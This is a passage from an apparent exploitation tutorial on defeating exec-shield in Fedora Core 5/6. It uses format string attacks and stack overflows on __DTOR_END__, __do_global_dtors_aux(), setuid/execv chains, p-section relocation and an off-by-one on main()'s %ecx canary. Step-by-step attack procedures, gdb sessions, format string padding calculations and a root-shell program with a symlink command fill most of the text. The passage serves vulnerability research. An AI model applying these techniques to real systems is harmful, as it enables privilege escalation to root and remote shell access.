overwrite the __DTOR_END__ section with do_system() and debug to check.


Breakpoint 1, 0x0077d320 in do_system () from /lib/tls/libc.so.6
(gdb) x/x 0x080494e4
0x80494e4 <__DTOR_END__>:       0x0077d320        ; overwrite __DTOR_END__ with do_system() function address
(gdb) i r
eax            0x80494e8        134517992        ; %eax holds __DTOR_END__ + 4
ecx            0x86d378 8835960
edx            0x77d320 7852832
ebx            0x80495b8        134518200
esp            0xfeed97fc       0xfeed97fc
ebp            0xfeed9808       0xfeed9808
esi            0xffffffff       -1
edi            0x80494d8        134517976
eip            0x77d320 0x77d320
eflags         0x206    518
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/x $eax
0x80494e8 <__JCR_LIST__>:       0x00000001
(gdb)

We can see that %eax is 4bytes past __DTOR_END__. A new shell will open if
we write the string "sh" at the address held in %eax. This gives a good
chance to execute a shell remotely without using the stack. You can see more
in the exploit code example.
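
The state of %eax at the moment of the call can be reproduced with a small
model of the loop. This is a sketch of the five numbered steps only, with
memory reduced to an array of words; the struct and function names are
invented for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

struct dtor_call { uint32_t target; uint32_t eax; };

/* Model of the loop in __do_global_dtors_aux(). table[i] is the word at
 * address base + 4*i; p starts as the address of the first entry. Records,
 * for each "call *%edx", the target and the value of %eax at that moment.
 * Returns the number of calls made. */
static size_t run_dtors(uint32_t p, uint32_t base, const uint32_t *table,
                        size_t nwords, struct dtor_call *log, size_t maxlog)
{
    size_t calls = 0;
    for (;;) {
        uint32_t eax = p;                   /* (1) mov p,%eax         */
        size_t idx = (eax - base) / 4u;
        if (eax < base || idx >= nwords)
            break;                          /* left the modeled memory */
        uint32_t edx = table[idx];          /* (2) mov (%eax),%edx    */
        if (edx == 0)
            break;                          /* (3) NULL ends the list */
        eax += 4u;                          /* (4) add $0x4,%eax      */
        p = eax;                            /*     mov %eax,p         */
        if (calls < maxlog) {
            log[calls].target = edx;        /* (5) call *%edx         */
            log[calls].eax = eax;
        }
        calls++;
    }
    return calls;
}
```

With the word at 0x080494e4 set to 0x0077d320, the model records one call
to 0x0077d320 with %eax equal to 0x080494e8, which matches the register
dump above.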


----[ 4.2 - Local exploit by moving %esp, %ebp register

  Although it is much more restricted than the former technique, we can
still move %esp and %ebp with a format string attack by building frames
many times on the stack. I thought I could move the %esp and %ebp registers
by calling a function repeatedly, but an ordinary function that runs both
prolog and epilog would not achieve anything. So I decided to try
__do_global_dtors_aux(). First of all, we need to make a frame.


        <__do_global_dtors_aux+25>:  call   *%edx ; push %eip

        <__do_global_dtors_aux+0>:   push   %ebp
        <__do_global_dtors_aux+1>:   mov    %esp,%ebp
        <__do_global_dtors_aux+3>:   sub    $0x8,%esp

<- Stack grows this way                                      Address grows this way  ->
+-------------+------+------++-------------+------+------++-------------+------+------+
|    8byte    | %ebp | %eip ||    8byte    | %ebp | %eip ||    8byte    | %ebp | %eip |
+-------------+------+------++-------------+------+------++-------------+------+------+
^                           ^^                           ^^                           ^
|                           ||                           ||                           |
+---------- 16byte ---------++---------- 16byte ---------++---------- 16byte ---------+

Each time the process above is repeated, 16 bytes of stack are consumed:
4 for the return address pushed by call, 4 for the saved %ebp, and 8 for the
local area. The stack can keep growing without the frame being removed
because the instruction at __do_global_dtors_aux+25 calls the desired
function with call *%edx before the epilog is reached. So we can move %esp
and %ebp indirectly by using __do_global_dtors_aux(). In addition, the
_fini() function that calls __do_global_dtors_aux() can also move the stack
pointer.
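
The 16-byte step can be checked with simple arithmetic. The following C
sketch is only a model and not part of the original exploit: the helper name
esp_after_reentries() and the sample %esp value are made up, and the frame
size assumes exactly the prolog of __do_global_dtors_aux() listed above.

```c
#include <assert.h>
#include <stdint.h>

/* Bytes consumed by one re-entry into __do_global_dtors_aux(): the return
 * address pushed by "call *%edx", the saved %ebp, and "sub $0x8,%esp". */
enum {
    RET_ADDR    = 4,
    SAVED_EBP   = 4,
    LOCALS      = 8,
    FRAME_BYTES = RET_ADDR + SAVED_EBP + LOCALS
};

/* Hypothetical helper: %esp after `reentries` nested frames that are never
 * torn down. The stack grows toward lower addresses, so %esp decreases. */
static uint32_t esp_after_reentries(uint32_t esp, unsigned reentries)
{
    assert((uint64_t)reentries * FRAME_BYTES <= esp); /* no wrap-around */
    return esp - (uint32_t)reentries * FRAME_BYTES;
}
```

For example, three nested entries starting from a (made up) %esp of
0xbfffe800 leave %esp at 0xbfffe7d0, which is 48 bytes lower.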


Fedora Core 6, glibc 2.5, gcc 4.1.1-30:

        <_fini+0>:   push   %ebp
        <_fini+1>:   mov    %esp,%ebp
        <_fini+3>:   push   %ebx
        <_fini+4>:   sub    $0x4,%esp
        <_fini+7>:   call   0x8048444 <_fini+12>
        <_fini+12>:  pop    %ebx
        <_fini+13>:  add    $0x1100,%ebx
        <_fini+19>:  call   0x8048300 <__do_global_dtors_aux>
        <_fini+24>:  pop    %ecx
        <_fini+25>:  pop    %ebx
        <_fini+26>:  leave
        <_fini+27>:  ret

This can be adjusted depending on the architecture of the target program.


----[ 4.3 - Using __do_global_dtors_aux() function, setuid() function and do_system() function

  Based on chapter 4.2, we can choose function arguments, even if only in a
restricted way. But the do_system() technique alone is still not good enough
for a local exploit. That is why we should combine it with setuid().
setuid() reads its argument from %ebp+8. All we need to do is find a stack
position where %ebp+8 holds NULL and call the function.

In my case on F/C 6, the argument of setuid() became 0 (NULL) when I called
__do_global_dtors_aux() once more. Now all we need to do is call do_system()
with the "sh" string set up properly. Then we will get a root shell.

...
+-------------------------+
| __do_global_dtors_aux() |: calling __do_global_dtors_aux()
+-------------------------+
|        setuid()         |: calling setuid()
+-------------------------+
|       do_system()       |: calling do_system()
+-------------------------+
|          "sh"           |
+-------------------------+
...

A stack based overflow that uses ret (pop %eip) code and execve() moves %esp
by 4 bytes at a time (the address increases and the stack shrinks). The
technique described here works in the opposite direction: it moves %esp and
%ebp by 16 bytes at a time (the address decreases and the stack grows). By
raising or lowering the registers in this way, we can find a suitable value
on the stack.
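
The search for a NULL argument can be pictured as stepping through the stack
16 bytes at a time. The sketch below is a toy model only: the snapshot array,
the slot index and the helper name are hypothetical, and on a real target the
values have to be read with a debugger.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define WORDS_PER_FRAME 4   /* 16 bytes / 4-byte words, from chapter 4.2 */

/* Hypothetical model: `stack` is a snapshot of stack words ordered by
 * increasing address, and `slot` is the index of the word that the next
 * call would read as its first argument. Each extra
 * __do_global_dtors_aux() frame lowers that slot by 16 bytes (4 words).
 * Returns the number of extra frames needed until the slot holds 0, or -1
 * if the low end of the snapshot is reached first. */
static int frames_until_zero_arg(const uint32_t *stack, size_t slot)
{
    assert(stack != NULL);
    for (int frames = 0; ; frames++) {
        if (stack[slot] == 0)
            return frames;
        if (slot < WORDS_PER_FRAME)
            return -1;
        slot -= WORDS_PER_FRAME;
    }
}
```

In a 12-word snapshot whose only zero is at index 1, starting from slot 9
takes two extra frames (9, 5, 1), while starting from slot 8 never hits a
zero and the helper returns -1.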


----[ 4.4 - Using __do_global_dtors_aux() function and exec family function

  The attack technique from chapter 4.3 has the problem that it is useful
only for obtaining root uid. To get around this, most local overflow
techniques use the exec family of functions. In this chapter, I will show a
local format string technique that uses an exec family function.

Only a small part of __do_global_dtors_aux() is needed to launch the attack.

First, I made a frame on the stack by calling __do_global_dtors_aux(). If
you do not allocate any local variables and only re-execute the call
instruction in __do_global_dtors_aux(), the %eip saved by the most recent
__do_global_dtors_aux() stays on the stack. When execv() is then called, that
saved %eip becomes its first argument. (We use execv() because it needs only
2 arguments.) The rest of the attack is the same as the exec family function
+ symlink attack.

Attack process:

(1) Overwrite __DTOR_END__+0 address with __do_global_dtors_aux() function
    address.

(2) Overwrite __DTOR_END__+4 address with __do_global_dtors_aux()+27
    address.

(3) Overwrite __DTOR_END__+8 address with execv() function address.

(4) Create a symlink to the program to execute, named after the bytes that
    the saved %eip of __do_global_dtors_aux() points to.

The stack will look like this if you allocate local variables and execute
the call *%edx instruction properly.


^
| Stack grows this way
...
+----------------------------------------+
| __do_global_dtors_aux() return address |: 4byte
+----------------------------------------+
| __do_global_dtors_aux() return address |: 4byte (will be the first argument of execv())
+----------------------------------------+
|              0x00000000                |: 8byte (will be the second argument of execv())
+----------------------------------------+
|              0x00000001                |
+----------------------------------------+
|     __do_global_dtors_aux() %ebp       |: 4byte
+----------------------------------------+
...
| Address grows this way
V

To build that stack layout, the call instruction at __do_global_dtors_aux+25
has to be executed correctly. For that, we must enter at
__do_global_dtors_aux+27, the instruction right after call *%edx. See the
code at __do_global_dtors_aux+27 in chapter 4.1.


        <__do_global_dtors_aux+27>:  mov    0x80495b4,%eax
                                            (Starting procedure to call *%edx register)

These are the values of the arguments when execve() is called from inside
execv().


Breakpoint 3, 0x0019dc28 in execve () from /lib/libc.so.6
(gdb) x/x $ebx
0x804834b <__do_global_dtors_aux+27>:   0x0495b4a1      ; first argument of execve()
(gdb) x/x $ecx
0x0:    Cannot access memory at address 0x0             ; second argument of execve()
(gdb) x/x $edx
0xbfdbd040:     0xbfdbec04                              ; third argument of execve()
(gdb) x 0x0804834b
0x804834b <__do_global_dtors_aux+27>:   0x0495b4a1      ; code bytes used as the first argument of execv()
(gdb)
0x804834f <__do_global_dtors_aux+31>:   0x85108b08
(gdb)
0x8048353 <__do_global_dtors_aux+35>:   0xc6eb75d2
(gdb)
0x8048357 <__do_global_dtors_aux+39>:   0x0495b805
(gdb)
0x804835b <__do_global_dtors_aux+43>:   0xc3c90108
(gdb)
0x804835f <__do_global_dtors_aux+47>:   0xe5895590
(gdb)
0x8048363 <frame_dummy+3>:      0xa108ec83
(gdb)
0x8048367 <frame_dummy+7>:      0x080494c4
(gdb)
0x804836b <frame_dummy+11>:     0x1274c085
(gdb)
0x804836f <frame_dummy+15>:     0x000000b8
(gdb)

The bytes from __do_global_dtors_aux+27 through frame_dummy+15 become the
first argument of execv(). After this, the rest of the procedure is the same
as the symlink attack described in chapter 3.3.


sh-3.1# cat > shell.c
#include <unistd.h>

int main()
{
        setuid(0);
        setgid(0);
        execl("/bin/bash","bash",(char *)0);
}

sh-3.1# gcc -o shell shell.c
sh-3.1# ln -s shell `printf "\xa1\xb4\x95\x04\x08\x8b\x10\x85\xd2\x75\xeb\xc6\x05\xb8\x95\x04\x08\x01\xc9\xc3\x90\x55\x89\xe5\x83\xec\x08\xa1\xc4\x94\x04\x08\x85\xc0\x74\x12\xb8"`

In this way we can create a symlink whose name is the __do_global_dtors_aux()
+ frame_dummy() code bytes that we examined in gdb, and have it run as a
command. This technique is also highly useful when you try to exploit a real
application. More details are in the example code.
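
As a cross-check, the symlink name can be derived from the gdb dump by
unpacking each little-endian word and stopping at the first NUL byte. This is
a small sketch; the names gdb_words and words_to_path() are mine and do not
come from the original exploit code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The ten 32-bit words printed by gdb, starting at
 * __do_global_dtors_aux+27 (copied from the session above). */
static const uint32_t gdb_words[10] = {
    0x0495b4a1, 0x85108b08, 0xc6eb75d2, 0x0495b805, 0xc3c90108,
    0xe5895590, 0xa108ec83, 0x080494c4, 0x1274c085, 0x000000b8
};

/* Unpack little-endian words into bytes and stop at the first NUL, the way
 * a C string path is read. Returns the number of bytes written to `out`
 * (terminator excluded); `out` must hold at least 4 * nwords bytes. */
static size_t words_to_path(const uint32_t *words, size_t nwords,
                            uint8_t *out)
{
    size_t len = 0;

    assert(words != NULL && out != NULL);
    for (size_t i = 0; i < nwords; i++) {
        for (int shift = 0; shift < 32; shift += 8) {
            uint8_t byte = (uint8_t)(words[i] >> shift);
            if (byte == 0)
                return len;
            out[len++] = byte;
        }
    }
    return len;
}
```

With the ten words above, words_to_path() yields 37 bytes, a1 b4 95 04 ...
74 12 b8, the same bytes that are passed to printf in the ln -s command.
None of them is '/' (0x2f), so the whole sequence can serve as a single file
name in the current directory.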


----[ 4.5 - Changing __DTOR_END__ location (overwriting p section)

  There is a problem with calling __do_global_dtors_aux() as described in
4.2. Every additional call needs another entry written after __DTOR_END__, so
calling the function many times can overwrite memory areas that hold critical
information. The heap area that gets overwritten may well contain data
structures and other critical information. Thus, it is difficult to call
functions many times freely. In fact, several sections follow the
__DTOR_END__ section, as you can see below.


...
+-------------------------+
|      __DTOR_END__       |
+-------------------------+
|      __JCR_LIST__       |
+-------------------------+
|        _DYNAMIC         |
+-------------------------+
|  _GLOBAL_OFFSET_TABLE_  |
+-------------------------+
|       data_start        |
+-------------------------+
...

If you call __do_global_dtors_aux() more times to search for information on
the stack, the chance of overwriting an important entry such as
_GLOBAL_OFFSET_TABLE_ becomes greater. This eventually has a bad effect on
the program flow.
               
The technique described here uses empty space in the heap by moving the
section to an arbitrary position, instead of using the __DTOR_END__ section
that was fixed at compile time. Let's look at __do_global_dtors_aux() again.


Fedora Core 6, glibc 2.5, gcc 4.1.1-30:

        <__do_global_dtors_aux+6>:   cmpb   $0x0,0x8049574 (1) check whether 0x8049574 is 0
        <__do_global_dtors_aux+13>:  je     0x804831b <__do_global_dtors_aux+27>
        <__do_global_dtors_aux+15>:  jmp    0x804832d <__do_global_dtors_aux+45>
        <__do_global_dtors_aux+17>:  add    $0x4,%eax
        <__do_global_dtors_aux+20>:  mov    %eax,0x8049570 (3) save 4bytes added %eax into 0x8049570
        <__do_global_dtors_aux+25>:  call   *%edx
        <__do_global_dtors_aux+27>:  mov    0x8049570,%eax (2) copy the value in 0x8049570 to %eax
        <__do_global_dtors_aux+32>:  mov    (%eax),%edx
        <__do_global_dtors_aux+34>:  test   %edx,%edx
        <__do_global_dtors_aux+36>:  jne    0x8048311 <__do_global_dtors_aux+17>

The first step compares the byte at 0x08049574 with 0. This is the completed
section, and it normally holds NULL. Next, the value stored at 0x8049570 is
loaded into %eax. This is the p section, which holds the address of the
__DTOR_END__ section. In short, %eax now holds the address of the
__DTOR_END__ section. Finally, %eax + 4 is stored back into the p section.
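
The loop in the listing can be written as a few lines of C. This is a sketch
reconstructed from the disassembly above, not the compiler's actual source,
and the struct and function names are hypothetical. It shows that whoever
controls the pointer stored in the p section controls which table of function
pointers is walked.

```c
#include <assert.h>
#include <stddef.h>

typedef void (*func_ptr)(void);

/* Model of the two objects the disassembly touches: the byte at 0x8049574
 * (completed section) and the word at 0x8049570 (p section). */
struct dtors_state {
    int completed;
    func_ptr *p;
};

/* Walks the table that p points into until a NULL entry is reached.
 * p is advanced and stored before each call, matching +17..+25. */
static void run_dtors_model(struct dtors_state *st)
{
    func_ptr f;

    assert(st != NULL && st->p != NULL);
    if (st->completed)                  /* +6:  cmpb $0x0,completed */
        return;
    while ((f = *st->p) != NULL) {      /* +27..+36: load p, *p, test */
        st->p++;                        /* +17..+20: p = p + 4 bytes */
        f();                            /* +25: call *%edx */
    }
    st->completed = 1;
}

/* Demo callees that record the order in which they ran. */
static int call_log[4];
static int call_count;
static void first(void)  { call_log[call_count++] = 1; }
static void second(void) { call_log[call_count++] = 2; }
```

If st.p is pointed at a table such as { first, second, NULL },
run_dtors_model() calls first() and second() in that order and leaves st.p
at the NULL entry, in the same way the real function would walk a relocated
__DTOR_END__.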

Now we can move the __DTOR_END__ section anywhere we want. The attack process
is as follows:

(1) Point the p section at an empty space in the heap.

(2) Overwrite p section+4 (the completed section) with null so that the
    comparison passes.

(3) Place the address of the function you want to call in the empty space in
    the heap.

(gdb) br __do_global_dtors_aux
...
(gdb) x/8 0x08049800 ; empty space in heap
0x8049800:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049810:      0x00000000      0x00000000      0x00000000      0x00000000
(gdb) c
Continuing.

Breakpoint 2, 0x08048306 in __do_global_dtors_aux ()
(gdb) set *0x08049800=0x828282
(gdb) x 0x08049800
0x8049800:      0x00828282        ; input garbage value into fake __DTOR_END__ address
(gdb) set *0x8049570=0x08049800
(gdb) x 0x8049570
0x8049570:      0x08049800        ; Change the content of p section
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00828282 in ?? ()
(gdb)

Writing a desired value to a chosen address is not hard when you carry out a
format string attack.
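
The arithmetic behind such a write is simple. The helper below is a sketch
that assumes the value is stored in two 16-bit halves with %hn; the name
pad_for_half() is hypothetical. It computes how many more characters must be
printed before each %hn so that the running output count has the wanted low
16 bits.

```c
#include <assert.h>
#include <stdint.h>

/* Number of additional characters to print so that the output count, taken
 * modulo 0x10000, equals `target`. `printed` is the number of characters
 * already written when the padding starts. */
static uint32_t pad_for_half(uint16_t target, uint32_t printed)
{
    uint32_t pad = ((uint32_t)target - printed) & 0xffffu;

    /* Postcondition: the low 16 bits of the new count match the target. */
    assert(((printed + pad) & 0xffffu) == target);
    return pad;
}
```

For the value 0x08049800, with 8 characters already printed, the low half
0x9800 needs 0x97f8 more characters, and the high half 0x0804 then needs
another 0x7004 because the count wraps at 0x10000. A real format string also
has to allow for the minimum width of the conversion that produces the
padding, which this sketch ignores.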

Unfortunately, the do_system() format string attack described in chapter 4.1
has to write to the __DTOR_END__ section. So, if the address of the
__DTOR_END__ section contained a terminator, a null byte or some other
special character, the attack was impossible until the program was
re-compiled.

But the p section changing technique that we just discussed does not need to
write to the original __DTOR_END__. It creates the __DTOR_END__ section
wherever you want. Thus, you can exploit the system without that trouble.
See the example code for more.
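
Because the location is now free to choose, it can be picked so that its
address contains none of the bytes that break the input. A sketch of such a
check follows. The set of bad bytes is an assumption (it depends on how the
target program reads its input), and both helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed set of bytes that cannot appear in the input. */
static int is_bad_byte(uint8_t b)
{
    return b == 0x00 || b == '\n' || b == '\r' || b == ' ' || b == '\t';
}

/* Returns 1 if any of the four bytes of `addr` is in the assumed bad set. */
static int addr_has_bad_byte(uint32_t addr)
{
    for (int shift = 0; shift < 32; shift += 8)
        if (is_bad_byte((uint8_t)(addr >> shift)))
            return 1;
    return 0;
}

/* First 4-byte aligned address in [start, end) without a bad byte,
 * or 0 if there is none. */
static uint32_t first_clean_addr(uint32_t start, uint32_t end)
{
    assert(start % 4 == 0 && start <= end && end <= 0xfffffffcu);
    for (uint32_t a = start; a < end; a += 4)
        if (!addr_has_bad_byte(a))
            return a;
    return 0;
}
```

With this set, 0x08049800 is rejected because of its 0x00 low byte, while
0x08049804 passes. In the gdb session above the address was set by hand, so
this restriction did not apply there.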


----[ 4.6 - Format string in classic shellcode library area

  This is not an efficient attack technique, but I want to discuss it to
show that shellcode can still be executed in the library area. The core of
the technique is writing shellcode into the library area with a format
string attack.

To make this work, you put the library address, which contains a null byte,
into an environment variable or argument, and brute-force its changing
position in memory with the $-flag.

The attack procedure is as follows:

(1) Find a usable library address.
(2) Pass the library address, which lies under 16mb, as a program argument
    and locate it on the stack by using the $-flag.
(3) Write a small shellcode into the library with the format string technique.
(4) Overwrite __DTOR_END__ of the target program with the library address
    that holds the shellcode.

The exploit procedure is as follows:

(1) Find the $-flag value needed to overwrite the __DTOR_END__ section with a
    certain value.
(2) Find the $-flag value needed to write the shellcode to the library
    address.
(3) Get the library address and the __DTOR_END__ address needed for the
    attack.
(4) The first argument holds the address of __DTOR_END__, the format string
    code that writes the shellcode somewhere in the library, and the format
    string code that writes the shellcode's address to __DTOR_END__. The
    library addresses are stored from the second argument onward.
(5) Repeat the attack while increasing the PAD value until the alignment
    with the library addresses we supplied is correct.

See the example code for more.


----[ 4.7 - Example code

  We have seen a few possible format string techniques under the exec-shield
environment. Some of the appendix code in chapter 6 demonstrates the 4 attack
techniques I have mentioned.

First, the 0x82-remote_do_system.sh script in chapter 6.5 covers the remote
attack technique from chapter 4.1. Second, the 0x82-p_section_overwrite.c
code in 6.6 covers the __do_global_dtors_aux() + setuid() + do_system()
attack from 4.3 and the p section overwrite from 4.5. Third,
0x82-dtors_execv_ex.c in 6.7 covers the __do_global_dtors_aux() + exec family
attack technique from 4.4. Finally, the shellcode attack from 4.6 is shown
in 6.8 as 0x82-library_terror/part_one.c and 0x82-library_terror/part_two.c.



--[ 5 - How to exploit since Fedora Core 5 system

  The vulnerabilities that I describe in chapters 5.1 and 5.2 do not seem
realistic. I mean, there is almost no chance of these vulnerabilities
occurring, because only the prolog and epilog of main() have been changed.
The change looks like a rough mixture of StackGuard and StackShield (7.6).
On the other hand, chapter 5.3 shows how to move the stack pointer by more
than 4 bytes, as mentioned in chapter 3.1, which can also be effective in a
remote overflow attack on a real application.


----[ 5.1 - Changes on main() function prolog and epilog

  The basic algorithm is quite similar to StackShield. But it keeps the
return address on the stack, not in the heap, and places the %ecx register,
which plays a role similar to the StackGuard canary, near the frame pointer
to protect the return address from alteration.


* Changed main() prolog since Fedora core 5:

(1)        lea    0x4(%esp),%ecx
(2)        and    $0xfffffff0,%esp
(3)        pushl  0xfffffffc(%ecx)
(4)        push   %ebp                ; prolog of normal main()
(5)        mov    %esp,%ebp
(6)        push   %ecx

(1) Load the address %esp+4 into the %ecx register.
(2) Align the %esp register with an "and" operation (%esp & -16).
(3) Push the return address found at %ecx - 4 onto the current stack.
(4) Save the %ebp register of the previous function on the current stack.
(5) Set the frame pointer for main() by copying %esp into %ebp.
(6) Save the %ecx register on the current stack, where it plays the same role
    as a canary.
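
The six steps can be followed with concrete numbers. The sketch below models
only the %esp arithmetic of the prolog; the struct, the function name and the
starting value of %esp are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

struct prolog_result {
    uint32_t ecx;        /* (1) original %esp + 4 */
    uint32_t ret_copy;   /* (3) address of the copied return address */
    uint32_t ebp;        /* (5) frame pointer of main() */
    uint32_t saved_ecx;  /* (6) address where %ecx is stored */
};

/* Replays the prolog on a given entry value of %esp. */
static struct prolog_result model_main_prolog(uint32_t esp)
{
    struct prolog_result r;

    assert(esp >= 0x20 && esp <= 0xfffffffbu); /* keep arithmetic in range */
    r.ecx = esp + 4;                 /* (1) lea 0x4(%esp),%ecx */
    esp &= 0xfffffff0u;              /* (2) and $0xfffffff0,%esp */
    esp -= 4; r.ret_copy = esp;      /* (3) pushl 0xfffffffc(%ecx) */
    esp -= 4; r.ebp = esp;           /* (4) push %ebp, (5) mov %esp,%ebp */
    esp -= 4; r.saved_ecx = esp;     /* (6) push %ecx */
    return r;
}
```

Starting from %esp = 0xbfffe82c, the model gives %ecx = 0xbfffe830, a frame
pointer of 0xbfffe818 and the saved %ecx at 0xbfffe814, directly below the
frame pointer.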

After all these steps, the stack looks like this:


^
| Address grows this way
...
+------------------------------------+ <- Original %esp register address: procedure (1)             |
| __libc_start_main() return address |                                                              |
+------------------------------------+                                                              |  
|                 ...                |                                                              |
+------------------------------------+ <- %esp register moved by procedure (2)                      |
| __libc_start_main() return address | <- %ecx -4 saved by procedure (3)                            |
+------------------------------------+                                                              |
|    previous base frame pointer     | <- %ebp register of previous function saved by procedure (4) |
+------------------------------------+ <- %ebp register moved by procedure (5)                      |
|           %ecx register            | <- %ecx register saved by procedure (6)                      |
+------------------------------------+ <- %esp register after all those 6 procedures                |
...                                                                                                 V
| Stack grows this way
V

These are the epilog procedures.


Epilog of main() since F/C 5:

(1)        pop    %ecx
(2)        pop    %ebp
(3)        lea    0xfffffffc(%ecx),%esp
(4)        ret

(1) Pop %ecx register from stack.
(2) Pop %ebp (previous base frame pointer) from stack.
(3) Move %esp register to original return address by putting %ecx - 4 address
    in %esp.
(4) Go back to __libc_start_main() function when %eip is popped by ret command.

In short, an ordinary stack overflow cannot change the return address,
because the %ecx register plays the same role as a canary.


----[ 5.2 - Exploit by using off-by-one exploit with %ecx register

  Because it is extremely difficult to guess the value of the %ecx register,
we overwrite only its lowest byte with NULL. Then we need to place the
address that will serve as the return address at %ecx-4, computed from the
%ecx whose lowest byte has been changed to null. This is similar to the
frame pointer overwrite, which changes the return address indirectly. (7.5)
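
The effect of zeroing the lowest byte can be computed directly. The sketch
below uses hypothetical helper names, and the buffer position in the usage
note is made up; it only shows where ret will fetch its address from after
the off-by-one.

```c
#include <assert.h>
#include <stdint.h>

/* Epilog step (3): "lea 0xfffffffc(%ecx),%esp" makes ret read from
 * %ecx - 4. */
static uint32_t ret_slot(uint32_t ecx)
{
    assert(ecx >= 4);
    return ecx - 4;
}

/* Effect of the off-by-one: the least significant byte of the saved %ecx
 * (stored first in memory on little-endian x86) becomes 0x00. */
static uint32_t ecx_after_off_by_one(uint32_t ecx)
{
    return ecx & 0xffffff00u;
}

/* Hypothetical check: does the forged return slot fall completely inside
 * the attacker-controlled buffer [buf, buf + len)? */
static int forged_slot_in_buffer(uint32_t ecx, uint32_t buf, uint32_t len)
{
    uint32_t slot = ret_slot(ecx_after_off_by_one(ecx));

    return slot >= buf && slot - buf + 4 <= len;
}
```

With a saved %ecx of 0xbfffe830, the forged value is 0xbfffe800 and ret reads
from 0xbfffe7fc, 0x30 bytes lower than the original slot at 0xbfffe82c. If a
256-byte buffer happened to start at 0xbfffe714, that slot would lie inside
it.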

Fill the usable space, up to 4 bytes before its end, with the address of ret
code, starting from the position that will become the return address. Put
the address of the main() epilog in the last 4 bytes so that the epilog is
executed twice. We execute the epilog once more because it moves the %esp
register near the argument pointers and environment variable pointers.
(A similar concept was mentioned in chapter 3.4.)

If %ecx receives an environment variable pointer when it is restored in the
main() epilog, then %ecx-4, which becomes the new %esp, points into the
environment variable data that we declared.

The attack is summarized below.


Making attack code:

Fill the local variables, except the last 4 bytes, with the address of ret
code. By doing so, the %ecx off-by-one makes the return address an address of
ret code. If we build the stack as in the picture below, the main() epilog
runs twice and execve() is called with the environment variables shown
further below.

^
| Stack grows this way
...
+-------------------+
|   ret(pop %eip)   |: Fill overflowed local variable with ret code
+-------------------+
|   ret(pop %eip)   |
+-------------------+
|   ret(pop %eip)   |
+-------------------+
|   ret(pop %eip)   |
+-------------------+
|   ret(pop %eip)   |: (2) Pop %eip from forged %ecx - 4
+-------------------+ <<----------------------------------------------------------------+
|   ret(pop %eip)   |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|   ret(pop %eip)   |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|   ret(pop %eip)   |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|        ...        |: (3) move %esp by 4bytes                                          |
+-------------------+                                                                   |
|   main() epilog   |: (4) recall epilog of main().            ----------------------+  |
+-------------------+                                                                |  |
|    0x??????00     |: (1) The last byte of %ecx register become null, --------------+--+
+-------------------+                                                                |
|        ...        |                                                                |
+-------------------+                                                                |
| argument0 pointer |: argument pointer starts here.                                 |
+-------------------+                                                                |
| argument1 pointer |                                                                |
+-------------------+                                                                |
| null(0x00000000)  |: argument pointer ends here.                                   |
+-------------------+                                                                |
| environ0 pointer  |: environment variable pointer starts here.                     |
+-------------------+                                                                |
| environ1 pointer  |                                                                |
+-------------------+                                                                |
| environ2 pointer  |                                                                |
+-------------------+                                                                |
| environ3 pointer  |                                                                |
+-------------------+                                                                |
|        ...        |                                                                |
+-------------------+                                                                |
| environ25 pointer |                                                                |
+-------------------+: 27th environment variable pointer                             |
| environ26 pointer | <<-------------------------------------------------------------+
+-------------------+: (5) pop %ecx into forged %esp register. ----------------------------+
| environ27 pointer |                                                                      |
+-------------------+                                                                      |
|        ...        |                                                                      |
+-------------------+                                                                      |
...                                                                                        |
| Address grows this way                                                                   |
V                                                                                          |
                                                                                           |
Making environment variables:                                                              |
                                                                                           |
Let's say there is a stack overflow vulnerability in a program that uses an                |
array of size 256. In this case, when the main() epilog runs a second time,                |
%ecx receives the address of the 27th environment variable. The epilog                     |
treats %ecx-4 as the location of the return address, so the 4 bytes just                   |
before the 27th env variable, which belong to the 26th env variable, are                   |
used as the return address. The execve() address is placed at the position                 |
of the 26th env variable.                                                                  |
                                                                                           |
...                                                                                        |
+------------------+                                                                       |
|   execve() addr  |: execve() function address (26th env variable which will be %ecx - 4) |
+------------------+                                                                       |
|      "XXXX"      |: 4byte dummy (27th env variable: environ26) <<------------------------+
+------------------+
|  "/bin/sh" addr  |: will be the first argument of execve() (input "sh" address in library)
+------------------+
|       '\0'       |: will be the second argument of execve() (0x00000000)
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |: will be the third argument of execve() (0x00000000)
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
...

Getting a shell through execve() and the environment variable pointers is
similar to the technique described in 3.4. See the example code for more.


----[ 5.3 - Overflow exploit overwriting __DTOR_END__ section

  In this chapter, we are going to talk about getting a shell through an
overflow on F/C 5 and later. If you cannot find good conditions for an
attack that uses only ret code, this chapter is for you.

We can move the stack pointer with the %esp moving technique from chapter 3.1.


Fedora Core 6, glibc 2.5, gcc 4.1.1-30:

        <__libc_csu_init>:
        ...
        add    $0x1c,%esp
        pop    %ebx
        pop    %esi
        pop    %edi                ; move %esp 12bytes from here
        pop    %ebp
        ret ; pop %eip

        <__do_global_ctors_aux>:
        ...
        add    $0x4,%esp
        pop    %ebx                ; move %esp 12bytes from here
        pop    %ebp
        ret ; pop %eip

The main idea of this chapter is closely related to Nergal's technique of
calling a copy function multiple times (7.7). It puts the address of the
function that you want to execute (such as system(), do_system() or an exec
family function) into __DTOR_END__, as in the format string attack.

First, we will look at the attack through do_system(). This technique does
not use the stack at all. On the other hand, system() and the exec family
functions need the stack to attack the system.

Attack process for do_system():

(1) Find, inside the program, each byte of the do_system() address and of the
    "sh" string. These bytes will be written to the __DTOR_END__ section.

(2) Build a chain that moves %esp by 12 bytes, using the plt entry of a copy
    function, the __do_global_ctors_aux() epilog, and the addresses found in
    step (1). This chain copies the do_system() address and the "sh" string
    into the __DTOR_END__ section.


<- Stack grows this way                                              Address grows this way  ->
+------------+------+-----------+-----------+------------+------+-----------+-----------+-----+
